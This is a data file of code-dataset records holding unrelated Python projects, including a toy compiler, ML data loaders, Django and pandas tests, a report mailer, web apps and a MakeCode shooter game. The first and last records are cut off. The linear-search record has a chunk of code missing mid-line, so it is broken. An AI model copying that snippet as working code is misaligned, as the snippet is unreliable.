0\r\n \r\ndef analisisSintactico(lista):\r\n if(esOperador(diccionario,lista[0])):\r\n error.append(\"Analisis Sintactico: incorrecto, No puede iniciar con un operador\")\r\n elif(lista[len(lista)-1] != '='):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay operaador de igualdad\")\r\n elif(not(lista[len(lista)-2].isalpha())):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay variable para asignar valor\")\r\n \r\n\r\na=open(\"datos.txt\",'r')\r\nlistaG= [y.split() for y in [x.strip('\\n') for x in a.readlines()]]\r\n\r\nanalisis(listaG)\r\n\r\n\r\n\r\n\r\n","repo_name":"SCVA/CompiladoresIntro","sub_path":"Ejercicio compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21852675959","text":"# Linear_search \r\n\r\ndef linear_search(alist,item):\r\n pos=0\r\n found=False\r\n\r\n while positem:\r\n stop=True\r\n else:\r\n pos+=1\r\n return found\r\n\r\nalist=[1,2,3,4,5,6,7,8,9,10]\r\nprint(linear_search1(alist,3))\r\nprint(linear_search1(alist,13))\r\n","repo_name":"rahul9852-dot/Data-Structure-and-Algorithms","sub_path":"DSA/searching&sorting/linear_searching.py","file_name":"linear_searching.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"24592828156","text":"import file_processor\nimport user_interface\n\nINPUT_FILE_NAME = 'text.txt'\n\n\ndef main():\n \"\"\"\n Main function of the application that initiates the text file processing.\n Process Flow:\n 1. Gets the path to the input text file (input_file_path) and the maximum\n line size (max_chunk_size)\n using the user interface from the user_interface module.\n 2. Processes the text file by splitting lines into chunks and saves the\n result in a separate file.\n This process is done using the process_file function from the\n file_processor module.\n \"\"\"\n\n # Path to the input text file (can be changed to another file).\n input_file_path = INPUT_FILE_NAME\n # Get the maximum line size.\n max_chunk_size = user_interface.get_max_chunk_size_from_user()\n\n # Start processing the text file with the specified maximum line size.\n file_processor.process_file(input_file_path, max_chunk_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-69-23","sub_path":"Tasks/Romanychev/Task4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30398302927","text":"from direct.gui.OnscreenText import OnscreenText \r\nfrom direct.gui.DirectGui import *\r\n\r\nfrom panda3d.core import NodePath\r\nfrom panda3d.core import TextNode\r\n\r\nclass TextInput():\r\n \r\n def __init__(self, pos, onEnterTextFn):\r\n self.onEnterTextFn = onEnterTextFn\r\n self.bk_text = \"This is my Demo\"\r\n# self.textObject = OnscreenText(text = self.bk_text, pos = (0.95,-0.95), \r\n# scale = 0.07, fg = (1,0.5,0.5,1), \r\n# align = TextNode.ACenter,mayChange=1)\r\n \r\n self.addText(pos)\r\n \r\n def addText(self, pos):\r\n self.entry = DirectEntry(text = \"\", scale=.05, command = self.setText,\r\n initialText=\"Type Something\", numLines = 2, \r\n focus=1, focusInCommand = self.clearText)\r\n entry = self.entry\r\n# entry.setColor(1, 1, 1, 0.5)\r\n entry.setPos(pos.x, 0, pos.y)\r\n print(\"bounds \" + str(entry.getHeight()))\r\n# entry.\r\n \r\n# self.entry.setObscureMode()\r\n \r\n def setText(self, textEntered):\r\n self.entry.destroy()\r\n self.onEnterTextFn(textEntered)\r\n \r\n def clearText(self):\r\n self.entry.enterText('')\r\n \r\n\r\n \r\n ","repo_name":"Nickan/Mind-Map-Panda3D","sub_path":"src/gui/textinput.py","file_name":"textinput.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"12255578938","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom datasets import load_dataset\nfrom transformers import AutoModel, AutoTokenizer\n\n\ndef collate_fn(batch):\n batch_input_ids = torch.stack([torch.tensor(x[\"input_ids\"]) for x in batch])\n batch_attention_masks = torch.stack([torch.tensor(x[\"attention_mask\"]) for x in batch])\n\n model = AutoModel.from_pretrained(\"distilbert-base-uncased\")\n outputs = model(batch_input_ids, attention_mask=batch_attention_masks)\n\n batch_inputs = outputs.last_hidden_state\n batch_outputs = torch.stack([torch.tensor(x[\"label\"]) for x in batch])\n return batch_inputs, batch_outputs\n\n\ndef get_dataloader_and_vocab(batch_size, split):\n tokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\n dataset = load_dataset(\"rotten_tomatoes\", split=split)\n encoded_dataset = dataset.map(lambda batch: tokenizer(batch[\"text\"], padding=True, truncation=True), batched=True, batch_size=None)\n\n dataloader = DataLoader(encoded_dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn)\n vocab = tokenizer.get_vocab()\n\n return dataloader, vocab\n\n\nif __name__ == \"__main__\":\n train_dataloader, vocab = get_dataloader_and_vocab(64, \"train\")\n batch_inputs, batch_outputs = next(iter(train_dataloader))\n print(batch_inputs.shape, batch_outputs.shape)\n","repo_name":"benjaminpodmore/nlp","sub_path":"RNN/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28297135767","text":"from features import scan\nfrom data import Data\nfrom random import choice\nfrom utils import draw_bar\n\nfrom typing import List\n\n\ndef evaluate(data: Data, prediction: str, example: bool = False) -> None:\n \"\"\"\n Evaluate data object on provided prediction prolix tag sequence.\n \"\"\"\n\n if len(data.trueTokenization) != len(prediction):\n raise Exception(\n f'True data length ({len(data.trueTokenization)}) does not match prediction length ({len(prediction)})'\n )\n\n wTP = 0\n wFP = 0\n wTN = 0\n wFN = 0\n\n indexFP = []\n indexFN = []\n\n POSITIVE = {'W', 'B'}\n NEGATIVE = {'N', 'S'}\n for i, (trueTag, predTag) in enumerate(zip(data.trueTokenization, prediction)):\n if trueTag in NEGATIVE and predTag in NEGATIVE:\n wTN += 1\n elif trueTag in POSITIVE and predTag in POSITIVE:\n wTP += 1\n elif trueTag in POSITIVE and predTag in NEGATIVE:\n wFN += 1\n indexFN.append(i)\n elif trueTag in NEGATIVE and predTag in POSITIVE:\n wFP += 1\n indexFP.append(i)\n\n def safeDiv(x: float, y: float):\n return x/y if y != 0 else float('nan')\n\n total = wTP + wFP + wTN + wFN\n wTP = safeDiv(wTP, total)\n wFP = safeDiv(wFP, total)\n wTN = safeDiv(wTN, total)\n wFN = safeDiv(wFN, total)\n\n print('Any-level: ')\n print(f'TP: {wTP*100:6.2f}%, FP: {wFP*100:6.2f}%')\n print(f'FN: {wFN*100:6.2f}%, TN: {wTN*100:6.2f}%')\n print(f'Precision: {wTP/(wTP+wFP)*100:6.2f}%')\n print(f'Recall: {wTP/(wTP+wFN)*100:6.2f}%')\n\n if example:\n show_sample(data, prediction, indexFN, indexFP)\n\n draw_bar()\n\n\ndef show_sample(data: Data, prediction: str, indexFN: List[int], indexFP: List[int], window: int = 20) -> None:\n if indexFP or indexFN:\n print()\n if indexFN:\n index = choice(indexFN)\n print('False Negative example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n if indexFP:\n index = choice(indexFP)\n print('False Positive example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n\n\ndef decode(data: Data, prediction: str) -> None:\n \"\"\"\n Decode input string against predicted sequence\n \"\"\"\n out = []\n buffer = ''\n for tag, char in zip(prediction, data.all):\n buffer += char\n if tag in {'W', 'B'}:\n out.append(buffer)\n buffer = ''\n out += buffer\n out = [x.strip() for x in out]\n return '|' + '|'.join(out) + '|'\n","repo_name":"zouharvi/hmm-tokenizer","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19982448080","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\nimport logging\nimport unittest\nimport json\nfrom bs4 import BeautifulSoup\nfrom django.test import Client\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n\nclass FetchAllExplanationsTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_regions(self, document):\n resp = self.client.post(\n '/python/scan',\n data={'origin': 'www.test.com', 'document': document})\n regions = json.loads(resp.content)['regions']\n return regions\n\n def test_get_region(self):\n string = \" abs(2) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 1)\n r = regions[0]\n self.assertEqual(\n r['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r['start_index'], 0)\n self.assertEqual(r['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r['document']).text\n )\n\n def test_get_multiple_regions(self):\n string = \" abs(2)\\nlen('fdsjkfds')\\nbin(1) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 3)\n r0 = regions[0]\n self.assertEqual(\n r0['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r0['start_index'], 0)\n self.assertEqual(r0['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r0['document']).text\n )\n\n r1 = regions[1]\n self.assertEqual(\n r1['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r1['start_index'], 7)\n self.assertEqual(r1['end_index'], 9)\n self.assertIn(\n \"Return the length (the number of items) of an object.\",\n BeautifulSoup(r1['document']).text\n )\n\n\nclass FetchExplanationForPlaintextTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_explanation(self, text):\n resp = self.client.post(\n '/python/explain',\n data={'origin': 'www.test.com', 'text': text})\n return resp.content\n\n def test_explain_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip')\n self.assertIn(\"This function returns a list of tuples,\", resp)\n\n def test_fail_to_explain_invalid_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip()')\n self.assertIn(\"'zip()' could not be explained as a python built-in.\", resp)\n","repo_name":"andrewhead/tutorons-server","sub_path":"tutorons/tests/python/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"14300387890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 20:45:59 2021\n\n@author: RISHBANS\n\"\"\"\n\nimport pandas as pd\ntennis_data = pd.read_csv(\"tennis.csv\")\n\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\no_e = OrdinalEncoder()\nX = tennis_data.drop(columns=['play'])\ny = tennis_data.play\n\nX = o_e.fit_transform(X)\n\ndt = DecisionTreeClassifier(criterion='entropy')\ndt.fit(X, y)\nprint(o_e.categories_)\n\ndt.predict([[1,0,1,0]])\n\n","repo_name":"edyoda/ML-with-Rishi","sub_path":"dt_tennis.py","file_name":"dt_tennis.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"32881100298","text":"# -*- coding: utf-8 -*-\n# Reporter: Send data email to recver.\n\nfrom module.mail.mail import Sender\nfrom module.database.db_opter import DBController\nfrom module.config.reporter import RPTerConfigReader\nfrom util.xlsx.writer import write_xlsx\nfrom util.common.date import Time\n\nimport os\nimport shutil\n\nclass Do():\n\n def __init__(self, rpt_name):\n self.rpt_name = rpt_name\n self.rpt_conf = RPTerConfigReader.rpter_config(rpt_name)\n self.db = DBController(rpt_name)\n\n def do(self):\n lj_path = self.data_from_db_lj\n qk_path = self.data_from_db_qk\n dk_path = self.data_from_db_dk\n zr_path = self.data_from_db_zr\n\n self.sender = Sender(\n msg = \"%s\\n数据采样时间:%s\"%(self.rpt_conf['recv']['recv_msg'], Time.now_date_str()),\n subject = \"%s => %s\"%(self.rpt_conf['recv']['recv_sub'], Time.now_date_str()),\n recvers = self.rpt_conf['recv']['recv_mail']\n )\n\n self.sender.add_attachment(*lj_path)\n self.sender.add_attachment(*qk_path)\n self.sender.add_attachment(*dk_path)\n self.sender.add_attachment(*zr_path)\n\n self.sender.send()\n\n\n def __data_from_db__(self, SQL, filename, sheetname, orderlist):\n RPT_PATH = \"./_output/{rpt}\".format(\n rpt = self.rpt_name\n )\n XLSX_PATH = \"{rpt}/{date}\".format(\n rpt = RPT_PATH,\n date = Time.now_date_str()\n )\n\n if not os.path.exists(RPT_PATH):\n os.mkdir(RPT_PATH)\n\n if not os.path.exists(XLSX_PATH):\n os.mkdir(XLSX_PATH)\n\n path = \"{xlsx}/{filename}.xlsx\".format(\n xlsx = XLSX_PATH,\n filename = sheetname\n )\n\n if os.path.exists(path):\n os.remove(path)\n\n self.db.execute(SQL)\n data = self.db.cur.fetchall()\n \n with write_xlsx(path, sheetname) as x:\n for d in data:\n x.write_dict(d, orderlist=orderlist)\n return filename, path\n\n @property\n def data_from_db_lj(self):\n '''data_from_db_lj\n Get Lianjia house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type_new as '房型', h.house_area as '房屋面积',\n h.house_price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infolj h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 1 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '链家信息采集'\n filename = 'LianjiaHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n\n @property\n def data_from_db_qk(self):\n '''data_from_db_qk\n Get Qingke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', '' as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infoqk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 3 and \n h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '青客信息采集'\n filename = 'QingkeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_dk(self):\n '''data_from_db_dk\n Get Danke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type as '房型', h.area as '房屋面积',\n h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infodk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 4 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '蛋壳信息采集'\n filename = 'DankeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_zr(self):\n '''data_from_db_zr\n Get Ziroom house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', h.house_type as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称', \n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infozr h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 2 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> ''\n and h.house_id <> ''\n \"\"\"\n sheetname = '自如信息采集'\n filename = 'ZiroomHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)","repo_name":"TauWu/template_crawler","sub_path":"do/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"} +{"seq_id":"74365883622","text":"import data_frame_cli as cli\nimport pandas as pd\nimport numpy as np\n\ndef test_print_shape(capsys):\n\n expected_out = ['df.shape', 'test.csv', '(5, 2)']\n\n cli.print_shape('test.csv', pd.DataFrame(np.random.randn(5, 2)))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_info(capsys):\n\n expected_out = ['df.info', '5 non-null', 'int']\n\n cli.print_info(True, pd.DataFrame(np.random.randint(0, 10, size=(5, 2)),\n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_head(capsys):\n\n expected_out = ['df.head', '10', '40']\n\n cli.print_head(True, pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_describe_none_column(capsys):\n\n expected_out = ['describe', 'bla not found']\n\n cli.print_describe('bla', pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result","repo_name":"ryanwbaker/ensf311-a3-data-frame-cli","sub_path":"data_frame_cli_test.py","file_name":"data_frame_cli_test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1189954750","text":"from __future__ import annotations\n\nimport pandas as pd\nimport streamlit as st\n\nfrom helpers import Data, Model, Scraper\n\nst.set_page_config(page_title='Real estate price estimation')\n\nst.write('Find out what a place would be worth?')\n\n# Setting up the session_state variables\nif 'scraper' not in st.session_state:\n st.session_state['scraper'] = Scraper()\n\nif 'model' not in st.session_state:\n st.session_state['model'] = Model.load_lgbm_pricing_model()\n\nscraper = st.session_state['scraper']\n\n# Searching for the desired place\nst.text_input(label='', value='78 avenue Raymond Poincaré', key='place')\nscraper.type_search(st.session_state['place'])\nscraper.search_place_with_url(scraper.get_suggestions()[0])\n\n# Retrieving the coordinates of the desired place\nlatitude, longitude = scraper.get_coordinates()\n\n# Load the data\nif 'df' not in st.session_state:\n # st.session_state['df'] = Data.load_df(explode=False)\n st.session_state['df'] = Data.load_data_for_lgbm()\n\n# Calculating the distance\ndf_distance = st.session_state['df'].pipe(Data.calculate_distance, latitude=latitude, longitude=longitude)\nmodel_data = df_distance.loc[[df_distance['distance'].argmin()], :].head(1).reset_index(drop=True)\n\n\ncolumns = st.columns(3)\n# Adding a metric with the price predictions for now\nwith columns[0]:\n current_price = st.session_state['model'].predict(model_data)[0]\n st.metric(label='Current price',\n value=f\"{current_price:,.{2}f} €\")\n# Adding a metric with the price predictions for in five years\nwith columns[1]:\n model_data_in_five_years = model_data.copy()\n model_data_in_five_years.loc[0, 'anneemut'] += 5\n price_in_five_years = st.session_state['model'].predict(model_data_in_five_years)[0]\n st.metric(label='Price in five years',\n value=f\"{price_in_five_years:,.{2}f} €\",\n delta=f'{(((price_in_five_years / current_price) - 1) * 100):,.{2}f} %')\n# Adding a metric with the money amount that could be expected if one invested current_price in an ECB bond\nwith columns[2]:\n ecb_five_year_equivalent = current_price * (1.02312) ** 5\n st.metric(label='ECB bond equivalent',\n value=f\"{ecb_five_year_equivalent:,.{2}f} €\",\n delta=f'{(((ecb_five_year_equivalent / current_price) - 1) * 100):,.{2}f} %')\n\n# Drawing the map\nst.map(pd.DataFrame({'lat': [latitude], 'lon': [longitude]}))\n","repo_name":"acktan/eleven-strategy","sub_path":"paris_pricer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6621904027","text":"from flask import Flask,render_template,request,jsonify\nimport random\nfrom dicionario import conveersao,dividir_distancias,dic\nfrom tempera import iniciarr\nfrom subidaencosta import iniciar\nfrom subidaencosta2 import iniciars\nfrom ag_pcv import ag\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n \n return render_template(\"index.html\")\n\n@app.route(\"/\", methods=['POST'])\ndef post():\n #barrinha = request.form['barrinha']\n #print(barrinha)\n tp = request.form['tp']\n ng = request.form['ng']\n tc = request.form['tc']\n tm = request.form['tm']\n ig = request.form['ig']\n distanciaentre = request.form['distanciasi']\n nomes = request.form['nome']\n latitude = request.form['latitudelongitude']\n \n \n nome,numero,latitudee = conveersao(distanciaentre,nomes,latitude)\n\n n = dividir_distancias(numero)\n print(len(n))\n sequencia_atual = list(range(len(n)))\n random.shuffle(sequencia_atual)\n #cursoencosta,distanciaencosta,lat = iniciar(n,nome,latitudee,sequencia_atual)\n #cursoencosta2,distanciaencosta2,lat2 = iniciars(n,nome,latitudee,sequencia_atual)\n #cursotempera,distanciatempera,lon = iniciarr(n,nome,latitudee,sequencia_atual)\n p,lat = ag(n,len(n),int(tp),int(ng),float(tc),float(tm),float(ig),latitudee)\n print(p)\n print(lat)\n #for i in range(len(lat)):\n # muda = lat[i].replace(\",\",\"/\")\n # lat[i] = muda\n #for i in range(len(lon)):\n # muda = lon[i].replace(\",\",\"/\")\n # lon[i] = muda\n #for i in range(len(lat2)):\n # muda = lat2[i].replace(\",\",\"/\")\n # lat2[i] = muda\n \n return render_template(\"index.html\",distanciaencosta = p,lat=lat)\n #if barrinha==\"se\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat)\n #elif barrinha == \"se*\":\n # return render_template(\"index.html\",distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n #elif barrinha ==\"temp\":\n # return render_template(\"index.html\", distanciatempera = \"\\n Distancia Tempera:\"+str(distanciatempera),cursotempera =\"\\n Curso Tempera:\"+str(cursotempera),long = lon)\n #elif barrinha ==\"todas\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat,cursotempera = \"\\n Curso Tempera:\"+str(cursotempera),distanciatempera=\"\\n Distancia tempera:\"+str(distanciatempera),long = lon,distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n\n \n \nif __name__ == \"__main__\":\n app.run()\n\n\n\n\n","repo_name":"Igao2/BarRoute","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36516820753","text":"import logging\n\nimport sbs.database_utility as db_util\nfrom sbs.models.TxMethod import TxMethod\nfrom sbs.utility import log_level\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\n\n\ndef add_tx_method(params):\n \"\"\"\n Adds tx_method record or returns tx_method record if already exists\n \"\"\"\n method_name = params['tx_method']\n try:\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n\n if tx_method:\n logger.info(\"TxMethod with method name [{}] already exists.\"\n .format(method_name))\n return tx_method\n\n tx_method = TxMethod(method_name)\n db_util.db_add_query(tx_method)\n db_util.db_commit()\n logger.info(\"Transformation method record for method {} added successfully.\"\n .format(method_name))\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n except Exception as e:\n logger.error('An error occurred : {}'.format(str(e)))\n raise Exception('Failed to fetch Transformation method id for method '\n '[{}] with error {} '.format(method_name, e))\n\n return tx_method\n","repo_name":"rohitbs113/DupontSBS","sub_path":"sbs/service/tx_method_service.py","file_name":"tx_method_service.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2281427634","text":"@namespace\nclass SpriteKind:\n Gas = SpriteKind.create()\n\ndef on_a_pressed():\n global darts, projectile\n darts = [assets.image(\"\"\"\n Dart1\n \"\"\"),\n assets.image(\"\"\"\n Dart2\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 5 1 1 1 1 5 \n 5 5 5 5 5 5 \n . . 5 5 . . \n . 5 . . 5 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 7 1 1 1 1 7 \n 7 7 7 7 7 7 \n . . 7 7 . . \n . 7 . . 7 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 9 1 1 1 1 9 \n 9 9 9 9 9 9 \n . . 9 9 . . \n . 9 . . 9 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n a 1 1 1 1 a \n a a a a a a \n . . a a . . \n . a . . a .\n \"\"\")]\n projectile = sprites.create_projectile_from_sprite(darts._pick_random(), mySprite, 0, -150)\n projectile.start_effect(effects.warm_radial, 100)\ncontroller.A.on_event(ControllerButtonEvent.PRESSED, on_a_pressed)\n\ndef on_on_overlap(sprite, otherSprite):\n global enemySpeed\n sprite.destroy(effects.disintegrate, 500)\n otherSprite.destroy()\n info.change_score_by(1)\n if info.score() == 5:\n game.show_long_text(\"Ship Intercom: We forgot to tell you, your projectiles steal data from the ships before destroying them. And also, please don't get hit too many times, these ships are really expensive.\",\n DialogLayout.BOTTOM)\n if info.score() == 10:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 70\n elif info.score() == 25:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 90\n elif info.score() == 40:\n game.show_long_text(\"Congrats soldier, you saved the galaxy. Accept this reward of $700,000,000!\",\n DialogLayout.BOTTOM)\n info.change_score_by(700000000)\n game.over(True)\nsprites.on_overlap(SpriteKind.enemy, SpriteKind.projectile, on_on_overlap)\n\ndef on_on_zero(status):\n game.show_long_text(\"Ship Intercom: Come in soldier... soldier? I TOLD HIM THESE ARE EXPENSIVE AS CRAP.\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.health, on_on_zero)\n\ndef on_on_overlap2(sprite2, otherSprite2):\n statusbar.value = 100\n otherSprite2.destroy()\nsprites.on_overlap(SpriteKind.player, SpriteKind.Gas, on_on_overlap2)\n\ndef on_on_zero2(status2):\n game.show_long_text(\"Ship Intercom: *slaps face* You needed to grab the fuel. COME ON!\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.energy, on_on_zero2)\n\ndef on_on_overlap3(sprite3, otherSprite3):\n statusbar2.value += -20\n otherSprite3.destroy(effects.fire, 500)\n scene.camera_shake(4, 500)\nsprites.on_overlap(SpriteKind.player, SpriteKind.enemy, on_on_overlap3)\n\nmyEnemy: Sprite = None\nmyFuel: Sprite = None\nprojectile: Sprite = None\ndarts: List[Image] = []\nstatusbar2: StatusBarSprite = None\nenemySpeed = 0\nstatusbar: StatusBarSprite = None\nmySprite: Sprite = None\ngame.splash(\"You feel a strange, cold breeze, and you are suddenly awoken by the President.\")\ngame.show_long_text(\"Mr. President: Hello, you've been selected to fight evil in the galaxy. Complete this mission for the chance to earn $700,000,000.\",\n DialogLayout.BOTTOM)\nscene.set_background_image(assets.image(\"\"\"\n Galaxy\n\"\"\"))\nscroller.scroll_background_with_speed(0, 10)\nmySprite = sprites.create(assets.image(\"\"\"\n Rocket\n\"\"\"), SpriteKind.player)\ncontroller.move_sprite(mySprite)\nmySprite.set_stay_in_screen(True)\nanimation.run_image_animation(mySprite,\n assets.animation(\"\"\"\n Flying Rocket\n \"\"\"),\n 100,\n True)\nstatusbar = statusbars.create(20, 4, StatusBarKind.energy)\nstatusbar.attach_to_sprite(mySprite, -30, 0)\nenemySpeed = 50\nstatusbar2 = statusbars.create(4, 20, StatusBarKind.health)\nstatusbar2.attach_to_sprite(mySprite, 0, 0)\nstatusbar.set_label(\"Gas\")\nstatusbar2.set_label(\"HP\")\n\ndef on_update_interval():\n global myFuel\n myFuel = sprites.create_projectile_from_side(assets.image(\"\"\"\n Fuel\n \"\"\"), 0, 80)\n myFuel.x = randint(5, 155)\n myFuel.set_kind(SpriteKind.Gas)\ngame.on_update_interval(5000, on_update_interval)\n\ndef on_update_interval2():\n global myEnemy\n myEnemy = sprites.create_projectile_from_side(assets.image(\"\"\"\n Spider\n \"\"\"), 0, enemySpeed)\n myEnemy.x = randint(5, 155)\n myEnemy.set_kind(SpriteKind.enemy)\n animation.run_image_animation(myEnemy,\n assets.animation(\"\"\"\n Flying Spider\n \"\"\"),\n 100,\n True)\ngame.on_update_interval(2000, on_update_interval2)\n\ndef on_update_interval3():\n statusbar.value += 